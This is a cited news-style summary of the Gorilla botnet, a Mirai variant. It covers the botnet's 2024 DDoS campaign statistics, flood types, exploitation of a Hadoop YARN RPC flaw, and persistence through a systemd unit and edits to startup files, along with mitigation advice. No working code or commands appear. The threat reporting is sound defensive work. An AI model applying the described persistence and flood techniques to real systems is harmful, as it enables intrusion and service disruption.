Cybersecurity researchers have discovered a new botnet malware family named Gorilla [1] [6], also known as GorillaBot [1]. This malware is a variant of the leaked Mirai botnet source code and has been responsible for a significant number of distributed denial-of-service (DDoS) attacks globally. The botnet’s activities have affected numerous organizations across various sectors, highlighting the growing threat of sophisticated cyber attacks.

## Description

Cybersecurity researchers have identified a new botnet malware family named Gorilla (also known as GorillaBot) [1] [6], which is a variant of the leaked Mirai botnet source code [1] [6]. Between September 4 and September 27, 2024 [1] [3] [6], the botnet issued over 300,000 distributed denial-of-service (DDoS) attack commands, averaging approximately 20,000 commands per day, and impacting around 20,000 organizations across more than 100 countries. The most affected regions include the US, China [2] [3] [4] [5] [6], Canada [2] [3] [4] [5] [6], and Germany [3] [4] [5] [6], with nearly 4,000 organizations located in the US. The botnet has been particularly disruptive to various sectors, including universities [3], government websites [3], telecoms [3], banks [3] [5], and gaming industries.

Gorilla employs a variety of DDoS attack methods, including UDP flood [2] [3] [4] [6], TCP ACK BYPASS flood [2] [3] [6], Valve Source Engine (VSE) flood [2] [3] [6], SYN flood [2] [3] [6], and ACK flood [2] [3] [4] [6]. The use of the connectionless UDP protocol facilitates arbitrary source IP spoofing [6], generating significant traffic that overwhelms target networks. Notably, a substantial portion of the attacks aimed to inundate networks with UDP packets, which are commonly utilized in gaming and video streaming [4]. Additionally, a significant number of attacks were TCP ACK Bypass flood attacks, specifically targeting certain ports with a large volume of spoofed TCP Acknowledgement (ACK) packets [4].

The botnet supports multiple CPU architectures [3] [6], such as ARM [3] [4] [6], MIPS [2] [3] [4] [6], x86_64 [2] [3] [4] [6], and x86 [3] [4] [6], and connects to one of five predefined command-and-control (C2) servers to receive DDoS commands [3] [6]. Gorilla features a total of 19 different DDoS attack methods, presenting significant challenges for target organizations [4], as each attack vector necessitates distinct mitigation strategies [4]. For instance [4], mitigating UDP flood attacks may involve rate limiting and blocking traffic to unused ports [4], while SYN ACK flood mitigation relies on stateful firewalls and intrusion-detection systems to validate TCP connections and process only legitimate ACK packets [4].

Additionally, Gorilla exploits a security flaw in Apache Hadoop YARN RPC for remote code execution [3] [5] [6], a vulnerability that has been known since at least 2021 [6]. The botnet maintains persistence on infected hosts by creating a service file named custom.service in the “/etc/systemd/system/” directory [3] [6], which runs automatically at system startup [3] [6]. It also modifies system files to ensure the execution of a shell script from a remote server upon startup or user login [3], with similar commands added to “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd.”

Gorilla employs advanced counter-detection techniques, utilizing encryption algorithms similar to those used by the Keksec group to conceal key information and maintain long-term control over IoT devices and cloud hosts [3] [6]. This combination of strategies allows the botnet to remain undetected for extended periods, demonstrating a high level of sophistication as an emerging threat. The rapid expansion of Gorilla and its capacity to conduct large-scale DDoS attacks represent a significant threat to businesses, governments [3] [5], and individuals, particularly as IoT devices become more prevalent. It is crucial for organizations in targeted sectors to strengthen their cybersecurity defenses to mitigate these attacks, as the evolution of cyber threats necessitates constant vigilance and proactive security measures.

## Conclusion

The emergence of the Gorilla botnet underscores the increasing sophistication and scale of cyber threats facing organizations worldwide. Its ability to execute large-scale DDoS attacks and exploit known vulnerabilities poses a significant risk to various sectors. To combat this threat, organizations must enhance their cybersecurity measures, employing strategies such as rate limiting, stateful firewalls [4], and intrusion detection systems [4]. As the prevalence of IoT devices continues to rise, maintaining robust cybersecurity defenses and staying informed about evolving threats will be essential in safeguarding against future attacks.

References

[1] https://cyber.vumetric.com/security-news/2024/10/07/new-gorilla-botnet-launches-over-300000-ddos-attacks-across-100-countries/
[2] https://www.cyclonis.com/pt/gorilla-botnet-unleashes-over-300000-ddos-attacks-across-100-countries/
[3] https://patabook.com/technology/2024/10/07/new-gorilla-botnet-launches-over-300000-ddos-attacks-across-100-countries/
[4] https://www.darkreading.com/cyberattacks-data-breaches/gorillabot-goes-ape-cyberattacks-worldwide
[5] https://thenimblenerd.com/article/gorillabot-on-the-loose-new-malware-swings-into-global-cyber-chaos/
[6] https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.html